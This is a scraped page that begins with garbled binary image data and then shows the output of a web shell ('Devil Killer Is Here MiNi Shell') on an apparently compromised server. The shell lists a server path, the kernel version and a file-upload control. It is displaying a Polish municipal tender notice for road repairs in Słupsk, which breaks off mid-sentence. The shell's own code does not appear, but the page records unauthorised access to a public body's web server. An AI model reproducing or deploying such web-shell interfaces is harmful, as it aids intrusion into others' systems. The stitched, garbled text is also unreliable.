JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241212/0064995301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> NAPRAWY I REMONTY DRÓG ZLOKALIZOWANYCH W PASACH DROGOWYCH W GRANICACH ADMINISTRACYJNYCH MIASTA SŁUPSKA ORAZ DRÓG WEWNĘTRZNYCH NALEŻĄCYCH DO MIASTA SŁUPSKA. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Infrastruktury Miejskiej w Słupsku</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 221221715</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Artura Grottgera 13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Słupsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">76-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL636 - Słupski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48598410091</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@zimslupsk.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zimslupsk.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> NAPRAWY I REMONTY DRÓG ZLOKALIZOWANYCH W PASACH DROGOWYCH W GRANICACH ADMINISTRACYJNYCH MIASTA SŁUPSKA ORAZ DRÓG WEWNĘTRZNYCH NALEŻĄCYCH DO MIASTA SŁUPSKA. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-be8fccdc-cc2a-4cbf-bf47-eb5de2274e5a</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00649953</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00049054/15/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.16 Wykonanie robót budowalnych polegających na naprawach i remontach dróg zlok. w pasach drogowych w granicach adm. m. Słupska oraz dróg wewnętrznych należ. do miasta Słupska - zad. nr 1- 3</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/zimslupsk <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/zimslupsk</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W przedmiotowym postępowaniu komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu następujących środków komunikacji elektronicznej:<br/>1)	Platformy zakupowej dostępnej pod adresem: https://platformazakupowa.pl/pn/zimslupsk<br/>2)	Poczty elektronicznej: zamowienia@zimslupsk.pl <br/>2.	Postępowanie prowadzone jest w języku polskim za pośrednictwem platformy zakupowej pod adresem: https://platformazakupowa.pl/pn/zimslupsk<br/>3.	W celu skrócenia czasu udzielenia odpowiedzi na pytania komunikacja między Zamawiającym a wykonawcami, w tym przekazywanie wszelkich oświadczeń, wniosków, zawiadomień oraz informacji, odbywa się za pośrednictwem https://platformazakupowa.pl/pn/zimslupsk i formularza „Wyślij wiadomość do zamawiającego”. <br/>Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem https://platformazakupowa.pl/pn/zimslupsk poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do zamawiającego. Zamawiający dopuszcza, opcjonalnie, komunikację za pośrednictwem poczty elektronicznej zamowienia@zimslupsk.pl <br/>4.	Zamawiający będzie przekazywał Wykonawcom informacje za pośrednictwem https://platformazakupowa.pl/pn/zimslupsk Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem https://platformazakupowa.pl/pn/zimslupsk do konkretnego Wykonawcy.<br/>5.	Oferta, wniosek oraz przedmiotowe środki dowodowe (jeżeli były wymagane) składane elektronicznie muszą zostać podpisane elektronicznym kwalifikowanym podpisem lub podpisem zaufanym lub podpisem osobistym. W procesie składania oferty, wniosku w tym przedmiotowych środków dowodowych na platformie, kwalifikowany podpis elektroniczny lub podpis zaufany lub podpis osobisty Wykonawca składa bezpośrednio na dokumencie, który następnie przesyła do systemu.<br/>6.	Poświadczenia za zgodność z oryginałem dokonuje odpowiednio Wykonawca, podmiot, na którego zdolnościach lub sytuacji polega Wykonawca, wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego albo podwykonawca, w zakresie dokumentów, które każdego z nich dotyczą. Poprzez oryginał należy rozumieć dokument podpisany kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez osobę/osoby upoważnioną/upoważnione. Poświadczenie za zgodność z oryginałem następuje w formie elektronicznej podpisane kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez osobę upoważnioną/osoby upoważnione.<br/>7. Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016 r., str. 1; zwanym dalej &#34;RODO&#34;) informujemy, że:<br/>1)	administratorem Pani/Pana danych osobowych jest Zarząd Infrastruktury Miejskiej w Słupsku, który działa w imieniu i na rzecz Miasta Słupsk, Plac Zwycięstwa 3, 76-200 Słupsk, reprezentowane przez Dyrektora,<br/>2)	administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem: Katarzyna Pierzchalska, adres e-mail: iod@zimslupsk.pl , telefon 59 841 00 91,<br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym bez negocjacji,<br/>4)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy Pzp.<br/>5)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy,<br/>6)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego,<br/>7)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO,<br/>8)	posiada Pani/Pan:<br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia),<br/>b)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników),<br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego),<br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO, <br/>9)	nie przysługuje Pani/Panu:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO,<br/>10)	przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.261.48.2024.ZP2</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Opis przedmiotu zamówienia w zakresie ZADANIA NR 1 – „Naprawa dróg o nawierzchniach ulepszonych”:<br/>1)	Do nawierzchni ulepszonych zalicza się nawierzchnie:<br/>a)	z kostki kamiennej, betonowej, żużlowej, klinkierowej,<br/>b)	betonowe,<br/>c)	mineralno-bitumiczne,<br/>2)	Do obowiązków Wykonawcy w zakresie ZADANIA NR 1 należy w szczególności:<br/>a)	naprawa pojedynczych uszkodzeń o wielkości do 12 m2 w nawierzchniach chodników i ścieżek rowerowych,<br/>b)	naprawa pojedynczych uszkodzeń o wielkości do 5 m2 w jezdniach o nawierzchniach bitumicznych oraz do 10 m2 w pozostałych nawierzchniach jezdni,<br/>c)	wykonanie remontów cząstkowych w nawierzchniach bitumicznych tj.:<br/>	zabezpieczenie i oznakowanie miejsca robót,<br/>	wycięcie i rozbiórka uszkodzonej nawierzchni z załadunkiem i wywozem gruzu,<br/>	oczyszczenie, osuszenie i posmarowanie krawędzi oraz powierzchni dna emulsją asfaltową,<br/>	ręczne wykonanie warstwy z przetworzonej mieszanki mineralno — asfaltowej lub z betonu asfaltowego,<br/>	ręczne wykonanie warstwy z przetworzonej mieszanki mineralno-asfaltowej,<br/>	zagęszczenie walcem drogowym wykonanej warstwy,<br/>	uszczelnienie krawędzi łaty masą zalewową i posypanie grysem 1-3,<br/>d)	wykonanie remontów cząstkowych mieszanką mineralno — emulsyjną o uziarnieniu ciągłym przy użyciu remontera,<br/>e)	naprawa (poprzez uszczelnianie) podłużnych i poprzecznych spękań nawierzchni bitumicznych,<br/>f)	stały monitoring stanu nawierzchni,<br/>g)	zgłaszanie Zamawiającemu potrzeb w zakresie napraw cząstkowych,<br/>h)	wykonywanie poleceń Zamawiającego w zakresie napraw cząstkowych,<br/>i)	wypełnienie spoin w nawierzchniach z kostki betonowej, kostki kamiennej, itp.,<br/>j)	zabezpieczenie prowadzonych robót zgodnie z przepisami o ruchu drogowym,<br/>k)	informowanie Zamawiającego o konieczności zorganizowania ruchu zastępczego na czas prowadzenia robót oraz przygotowanie tymczasowej organizacji ruchu i wykonanie związanego z tym oznakowania,<br/>l)	powiadomienie (e-mailem) Zamawiającego, przed przystąpieniem do robót, o terminie, lokalizacji i zakresie robót wraz z podaniem sposobu oznakowania robót,<br/>m)	oczyszczenie i przewiezienie, zważonego lub zliczonego pełnowartościowego materiału z rozbiórki na wskazane miejsce w obrębie do 10 km; koszt ważenia materiałów rozbiórkowych ponosi Wykonawca,<br/>n)	skompletowanie oraz przedstawienie dokumentów pozwalających na ocenę prawidłowego wykonania przedmiotu zamówienia,<br/>o)	zorganizowanie i prowadzenie zleconych robót z należytą starannością z zachowaniem procesu technologicznego,<br/>p)	prowadzenie na bieżąco książki obmiarów i dokumentów rozliczeniowych i przedłożenie Zamawiającemu nie później niż 5 dni od daty zakończenia robót,<br/>q)	wykonanie robót w zakresie naprawy ubytków w nawierzchniach dróg krajowych i wojewódzkich niezwłocznie, nie później niż w następnym dniu od dnia zgłoszenia (w formie: e-maila lub rozmowy telefonicznej), w pozostałych kategoriach dróg nie później niż w ciągu 2 dni od dnia zgłoszenia lub zgodnie z ustalonym przez Zamawiającego terminem,<br/>r)	w przypadku zgłoszonych awarii zabezpieczenie i oznakowanie tego miejsca niezwłocznie po otrzymaniu informacji (w formie: e-maila lub rozmowy telefonicznej), nie później niż w ciągu 1 godziny.<br/>2. Roboty należy prowadzić bez zamykania całej szerokości jezdni, przy zachowaniu ruchu na drogach.<br/>3. Wykonawca obowiązany jest wykonać roboty zgodnie z zasadami wiedzy i sztuki budowlanej oraz w oparciu o Ogólne Specyfikacje Techniczne opracowane przez Generalną Dyrekcję Dróg Krajowych i Autostrad w Warszawie wymieniowe w rozdziale IV pkt 5 ppkt 5 SWZ.<br/> 4. Realizacja przedmiotu zamówienia, będzie odbywała się na podstawie zleceń udzielanych przez Zamawiającego. Wielkość i rodzaj wykonywanych robót będzie ustalana przez Zamawiającego z każdorazowym określeniem zakresu robót wynikającego z aktualnych potrzeb. Nie dotyczy to sytuacji wynikających z zaistniałych awarii, gdzie zakres robót będzie ustalany na bieżąco.<br/>5. Wykonawca ma obowiązek zapewnić bezpośrednią całodobową łączność telefoniczną.<br/>6. Wykonawca zobowiązany jest do zapewnienia całodobowej dyspozycyjności na cały okres realizacji zamówienia.<br/>7. Zamawiający wymaga od Wykonawcy udzielenia gwarancji i rękojmi na wykonane roboty budowlane na okres nie krótszy niż ZADANIE NR 1 – 6 miesięcy, licząc od dnia odbioru robót (zlecenia).<br/>8. Wykonawca musi posiadać polisę ubezpieczeniową od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej za szkody wyrządzone w związku z realizacją przedmiotu zamówienia w każdym roku obowiązywania umowy na kwotę nie mniejszą niż: ZADANIE NR 1: 2 500 000,00 zł na jedno i wszystkie zdarzenia w okresie ubezpieczenia.<br/>9. Szczegółowy opis i warunki realizacji przedmiotu zamówienia dla ZADANIA NR 1 wskazano w SWZ i projekcie umowy stanowiącym załączniki nr 9A do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233141-9 - Roboty w zakresie konserwacji dróg</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. Zamawiający w ramach realizacji przedmiotu zamówienia przewiduje możliwość zastosowania prawa OPCJI, o którym mowa w art. 441 ustawy Pzp. <br/>2. PRAWO OPCJI – warunki i zasady skorzystania z prawa opcji;<br/>a)	Przedmiot zamówienia ZADANIA NR 1 obejmuje roboty z podziałem na zakres PODSTAWOWY i prawo OPCJI, których opis i ilości zostały określone w Formularzu cenowym/kosztorysie ofertowym stanowiącym załącznik nr 1A do SWZ.<br/>b)	Zamawiający ma prawo jednostronnie rozszerzyć przedmiot zamówienia (prawo opcji).<br/>c)	Zamawiający zastrzega, że zakres opcjonalny zamówienia nie stanowi zobowiązania umownego (w tym finansowego) Zamawiającego zaciąganego w momencie zawarcia umowy, przewidywany zakres opcjonalny zamówienia nie jest gwarantowany do realizacji.<br/>d)	Skorzystanie z prawa opcji może nastąpić raz lub więcej razy w okresie realizacji zamówienia i uzależnione będzie wyłącznie od potrzeb Zamawiającego i możliwości finansowych Zamawiającego. W przypadku nie skorzystania przez Zamawiającego z prawa opcji, Wykonawcy nie przysługują żadne roszczenia.<br/>e) Wszystkie wymagania i zasady realizacji przedmiotu zamówienia ZADANIA NR 1 w zakresie zamówienia podstawowego dotyczą także realizacji zamówienia w ramach prawa opcji.<br/>f) zakres czynności określony w ZADANIU NR 1 w ramach prawa OPCJI dotyczy czynności wykonywanych w ramach zamówienia podstawowego, o których mowa w rozdz. IV SWZ pkt 5 ppkt 6 lit. f i w Formularzu cenowym/kosztorysie ofertowym - zał. nr 1A do SWZ.<br/>3. Warunki realizacji przedmiotu zamówienia w ramach prawa OPCJI wskazano w SWZ i projekcie umowy stanowiącym załączniki nr 9A do SWZ. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Według kryteriów opisanych w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi na wykonane roboty</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ZADANIE NR 2<br/>1. Opis przedmiotu zamówienia w zakresie ZADANIA NR 2 – „Wykonanie robót budowlanych w obrębie pasa drogowego”:<br/>1)	Zadanie polega na 